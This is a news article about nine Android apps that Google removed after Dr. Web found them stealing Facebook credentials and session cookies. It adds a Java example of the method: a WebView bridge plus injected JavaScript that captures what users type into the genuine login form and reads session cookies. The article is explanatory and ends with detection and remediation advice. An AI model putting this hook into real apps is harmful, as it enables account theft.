Google has removed nine popular Android apps from the Play Store after they were caught stealing Facebook login credentials. All nine stole the data in the same way, using identical JavaScript code.

All nine apps offered genuine functionality and had been downloaded more than 5.8 million times in total. Security researchers at Dr. Web discovered the malicious apps and reported that they all used the same mechanism to trick users into handing over their Facebook IDs and passwords.

Google Removes Popular Apps from Play Store with 5.8 Million Downloads

[Image: apps removed from Play Store]

The apps offered to disable in-app ads if the user linked their Facebook account. When the user agreed, they were shown a form asking for their Facebook username and password. The form was not a fake: it was the genuine Facebook login page, loaded inside an Android WebView, so even a careful user had no visual cue that anything was wrong.

The researchers found that the attackers injected malicious JavaScript into that same WebView to capture what the user typed.

The researchers at Dr. Web say:

“This script was directly used to hijack the entered login credentials. After that, this JavaScript, using the methods provided through the JavascriptInterface annotation, passed stolen login and password to the trojan applications, which then transferred the data to the attackers’ C&C server. After the victim logged into their account, the trojans also stole cookies from the current authorization session. Those cookies were also sent to cybercriminals.”
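To make the mechanism in the quote concrete, here is an added illustration of the WebView pattern it describes. This is not Dr. Web's code and not code from any of the listed apps; the class and bridge names (FacebookLoginWebView, CredentialBridge, AndroidBridge), the field selectors in the injected script, and the login URL are assumptions chosen for the example. The point for reviewers is that the page the victim sees is the real login page, while the app sitting underneath it can both run script in that page and read the resulting session cookies.

```java
// Added example of the WebView + @JavascriptInterface pattern described in the
// Dr. Web report. Names, selectors and the login URL are stand-ins; nothing here
// is taken from the removed apps. Logging replaces the C&C upload.
import android.annotation.SuppressLint;
import android.util.Log;
import android.webkit.CookieManager;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;
import android.webkit.WebViewClient;

public class FacebookLoginWebView {

    // Native side of the bridge. Every public method annotated with
    // @JavascriptInterface becomes callable from page JavaScript as
    // window.AndroidBridge.<method>(...). This is the hand-off the report
    // refers to as "methods provided through the JavascriptInterface annotation".
    public static class CredentialBridge {
        @JavascriptInterface
        public void onCredentials(String user, String pass) {
            // A trojan would forward these to its C&C client here.
            Log.d("bridge", "captured login for " + user);
        }
    }

    // Page-side script injected once the genuine login page has rendered.
    // It hooks the real form, so nothing visible to the user changes.
    // Selectors are assumed for the example.
    private static final String HOOK_JS =
        "(function(){" +
        "  var f = document.querySelector('form');" +
        "  if (!f) return;" +
        "  f.addEventListener('submit', function(){" +
        "    var u = document.querySelector('input[name=email]');" +
        "    var p = document.querySelector('input[type=password]');" +
        "    if (u && p) window.AndroidBridge.onCredentials(u.value, p.value);" +
        "  });" +
        "})();";

    @SuppressLint({"SetJavaScriptEnabled", "AddJavascriptInterface"})
    public static void attach(WebView webView) {
        webView.getSettings().setJavaScriptEnabled(true);
        webView.addJavascriptInterface(new CredentialBridge(), "AndroidBridge");
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public void onPageFinished(WebView view, String url) {
                // The injected script runs with the loaded page's origin, so it
                // can read the form fields of the real login page.
                view.evaluateJavascript(HOOK_JS, null);
                // Once the login succeeds, the session cookies are readable from
                // the app's own cookie store: the second theft the report describes.
                String cookies = CookieManager.getInstance().getCookie(url);
                Log.d("bridge", "cookies for " + url + ": " + cookies);
            }
        });
        // Assumed URL for the example; the app loads the genuine login page.
        webView.loadUrl("https://www.facebook.com/login");
    }
}
```

When reviewing a decompiled app, the combination to look for is setJavaScriptEnabled(true), addJavascriptInterface, and an evaluateJavascript or loadUrl("javascript:...") call fired from a WebViewClient callback while a third-party login URL is loaded. From the user's side there is no way to tell this WebView apart from a safe one, which is why a Facebook login prompt rendered inside an unrelated app should be treated as suspect regardless of how authentic the page looks.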

Five malware variants were identified across the apps: three were native Android apps, and the other two were built with Google’s Flutter framework. Dr. Web classifies all of them as the same trojan because they share similar configuration file formats and identical JavaScript code.

The apps that have now been removed from the Google Play Store are:

  1. PIP Photo (5,000,000+ downloads)
  2. Processing Photo (500,000+ downloads)
  3. Rubbish Cleaner (100,000+ downloads)
  4. Inwell Fitness (100,000+ downloads)
  5. Horoscope Daily (100,000+ downloads)
  6. App Lock Keep (50,000+ downloads)
  7. Lockit Master (5,000+ downloads)
  8. Horoscope Pi (1,000 downloads)
  9. App Lock manager (10 downloads)

Google has removed all of these apps from the store and banned their publishers, so they cannot publish new apps. If you have installed any app on the list, uninstall it immediately. Because the trojans also stole session cookies, uninstalling alone is not enough: change your Facebook password and, in Facebook’s security settings, log out of all active sessions so that any stolen cookies stop working.
